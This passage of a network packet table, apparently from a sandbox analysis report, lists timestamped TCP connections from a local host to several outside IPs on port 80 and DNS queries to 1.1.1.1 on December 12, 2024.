                                                                                  Dec 12, 2024 00:19:52.711148024 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711468935 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711486101 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711493969 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711517096 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711541891 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.716586113 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.716640949 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:53.065840006 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.086905956 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.208141088 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:54.208228111 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.223640919 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.345175982 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:54.347357988 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398338079 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398406982 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398417950 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398570061 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398581028 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398802996 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398821115 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398832083 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398842096 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398852110 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398864031 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.398864031 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.399358034 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.406243086 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.406497002 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.738966942 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.755945921 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.875186920 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:56.881412029 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.886972904 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:57.006221056 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.044935942 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045036077 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045053959 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045150042 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045278072 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045295000 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045310974 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045321941 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045331001 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045371056 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045689106 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045732021 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045814991 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045830011 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045871973 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045974970 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.046025038 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.054088116 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.173464060 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:20:03.628238916 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.747567892 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:03.747709990 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.762929916 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.883215904 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.992533922 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.992724895 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.998935938 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:05.269303083 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.288503885 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.409848928 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:06.409941912 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.429075003 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.550086021 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656577110 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656647921 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656868935 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:07.940706968 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:08.959703922 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.080863953 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:09.081011057 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.097485065 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.218832970 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:09.218859911 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574354887 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574373007 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574430943 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:10.611747026 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.611799955 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:10.612493038 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.631360054 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.752111912 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:11.758896112 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.766904116 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.887933016 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.984282017 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.984293938 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.985064030 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:12.987770081 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:13.109086037 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:19.361618042 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.480868101 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:19.481005907 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.499521017 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.618803024 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.003076077 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:21.104382992 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.104516029 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.104657888 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:21.104657888 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:21.123939991 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.124105930 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:22.022130966 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:22.141387939 CET805000218.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:22.141470909 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:22.157824993 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:22.277080059 CET805000218.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:23.660886049 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:23.732131958 CET805000218.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:23.732148886 CET805000218.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:23.733181000 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:23.733181000 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:23.782018900 CET805000218.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:23.784701109 CET5000280192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:24.678173065 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:24.797619104 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:24.797718048 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:24.813807011 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:24.933172941 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:24.933249950 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:26.315495014 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:26.393815041 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:26.393897057 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:26.393908978 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:26.393995047 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:26.436636925 CET805000318.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:26.436744928 CET5000380192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:27.335360050 CET5000480192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:27.457237959 CET805000418.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:27.458986044 CET5000480192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:27.474821091 CET5000480192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:27.596007109 CET805000418.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:29.046928883 CET805000418.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:29.047007084 CET805000418.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:29.047422886 CET5000480192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:29.050827980 CET5000480192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:29.171603918 CET805000418.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:34.922838926 CET5000580192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:35.042401075 CET8050005101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:35.042692900 CET5000580192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:35.068353891 CET5000580192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:35.187824965 CET8050005101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:36.572283983 CET8050005101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:36.572443008 CET8050005101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:36.572504044 CET5000580192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:36.581084013 CET5000580192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:37.599263906 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:37.719213963 CET8050006101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:37.721451998 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:37.733057976 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:37.852473021 CET8050006101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:39.237741947 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:39.250551939 CET8050006101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:39.250729084 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:39.250771999 CET8050006101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:39.251351118 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:39.358573914 CET8050006101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:39.358791113 CET5000680192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:40.257128000 CET5000780192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:40.378072977 CET8050007101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:40.378160954 CET5000780192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:40.390288115 CET5000780192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:40.511120081 CET8050007101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:40.512681007 CET8050007101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:41.893842936 CET5000780192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:42.015533924 CET8050007101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:42.015598059 CET5000780192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:42.911911011 CET5000880192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:43.033790112 CET8050008101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:43.034842968 CET5000880192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:43.044095039 CET5000880192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:43.165390968 CET8050008101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:44.566230059 CET8050008101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:44.566247940 CET8050008101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:44.566391945 CET5000880192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:44.569375992 CET5000880192.168.2.5101.32.205.61
                                                                                  Dec 12, 2024 00:20:44.688711882 CET8050008101.32.205.61192.168.2.5
                                                                                  Dec 12, 2024 00:20:52.751106977 CET5000980192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:52.872113943 CET805000938.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:52.872210979 CET5000980192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:52.883976936 CET5000980192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:53.005058050 CET805000938.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:54.153814077 CET805000938.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:54.153834105 CET805000938.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:54.154006004 CET5000980192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:54.393544912 CET5000980192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:55.439996958 CET5001080192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:55.561780930 CET805001038.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:55.562812090 CET5001080192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:55.573148966 CET5001080192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:55.694588900 CET805001038.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:56.845474958 CET805001038.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:56.845530033 CET805001038.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:56.845701933 CET5001080192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:57.081150055 CET5001080192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:58.099150896 CET5001180192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:58.219670057 CET805001138.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:58.219784975 CET5001180192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:58.232774973 CET5001180192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:58.352396011 CET805001138.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:58.352437973 CET805001138.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:59.519824982 CET805001138.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:59.519870996 CET805001138.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:20:59.519969940 CET5001180192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:20:59.737185955 CET5001180192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:00.756251097 CET5001280192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:00.875891924 CET805001238.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:21:00.876108885 CET5001280192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:00.888006926 CET5001280192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:01.007742882 CET805001238.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:21:02.185863018 CET805001238.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:21:02.185911894 CET805001238.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:21:02.186162949 CET5001280192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:02.188659906 CET5001280192.168.2.538.6.78.235
                                                                                  Dec 12, 2024 00:21:02.310280085 CET805001238.6.78.235192.168.2.5
                                                                                  Dec 12, 2024 00:21:07.675323963 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:07.796185017 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:07.797244072 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:07.809226036 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:07.930413961 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:09.175654888 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:09.175688028 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:09.175707102 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:09.175800085 CET80500133.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:09.175863028 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:09.179368973 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:09.316818953 CET5001380192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:10.334728003 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:10.456523895 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:10.456617117 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:10.474838972 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:10.596410036 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:11.851180077 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:11.851201057 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:11.851213932 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:11.851361990 CET80500143.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:11.851422071 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:11.851823092 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:11.988296986 CET5001480192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:13.007074118 CET5001580192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:13.126652002 CET80500153.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:13.126856089 CET5001580192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:13.138943911 CET5001580192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:13.258429050 CET80500153.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:13.258483887 CET80500153.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:14.495083094 CET80500153.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:14.495151043 CET5001580192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:14.643383980 CET5001580192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:14.762726068 CET80500153.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:15.662360907 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:15.781971931 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:15.782074928 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:15.791404009 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:15.912586927 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:17.158143044 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:17.158221006 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:17.158231020 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:17.158384085 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:17.158405066 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:17.158562899 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:17.162758112 CET5001680192.168.2.53.125.36.175
                                                                                  Dec 12, 2024 00:21:17.283638000 CET80500163.125.36.175192.168.2.5
                                                                                  Dec 12, 2024 00:21:22.506592989 CET5001780192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:22.625998974 CET8050017172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:22.626084089 CET5001780192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:22.641112089 CET5001780192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:22.760489941 CET8050017172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:24.143527031 CET5001780192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:24.263488054 CET8050017172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:24.263566971 CET5001780192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:25.163871050 CET5001880192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:25.283320904 CET8050018172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:25.285845995 CET5001880192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:25.298693895 CET5001880192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:25.418106079 CET8050018172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:26.799915075 CET5001880192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:26.919802904 CET8050018172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:26.919979095 CET5001880192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:27.817800045 CET5001980192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:27.940200090 CET8050019172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:27.945100069 CET5001980192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:27.953502893 CET5001980192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:28.075232029 CET8050019172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:28.076981068 CET8050019172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:29.458673000 CET5001980192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:29.578603029 CET8050019172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:29.584827900 CET5001980192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:30.475109100 CET5002080192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:30.595726967 CET8050020172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:21:30.595881939 CET5002080192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:30.642664909 CET5002080192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:21:30.763724089 CET8050020172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:22:10.729553938 CET8050020172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:22:10.729927063 CET8050020172.67.176.240192.168.2.5
                                                                                  Dec 12, 2024 00:22:10.730052948 CET5002080192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:22:10.732274055 CET5002080192.168.2.5172.67.176.240
                                                                                  Dec 12, 2024 00:22:10.853157997 CET8050020172.67.176.240192.168.2.5

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 12, 2024 00:18:30.029191971 CET5038853192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:18:30.506660938 CET53503881.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:18:46.802054882 CET5655153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:18:47.311109066 CET53565511.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:19:01.695694923 CET5736653192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:19:02.454905987 CET53573661.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:19:16.758668900 CET6420153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:19:17.672605991 CET53642011.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:19:32.366599083 CET6244553192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:19:33.134543896 CET53624451.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:19:47.803029060 CET6502553192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:19:48.759537935 CET53650251.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:03.084351063 CET5017153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:03.625883102 CET53501711.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:18.006520033 CET5816753192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:19.005263090 CET5816753192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:19.359355927 CET53581671.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:19.359369040 CET53581671.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:34.053006887 CET5416853192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:34.920676947 CET53541681.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:49.586735010 CET5604153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:50.596684933 CET5604153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:51.597526073 CET5604153192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:20:52.748687029 CET53560411.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:52.748728991 CET53560411.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:20:52.748756886 CET53560411.1.1.1192.168.2.5
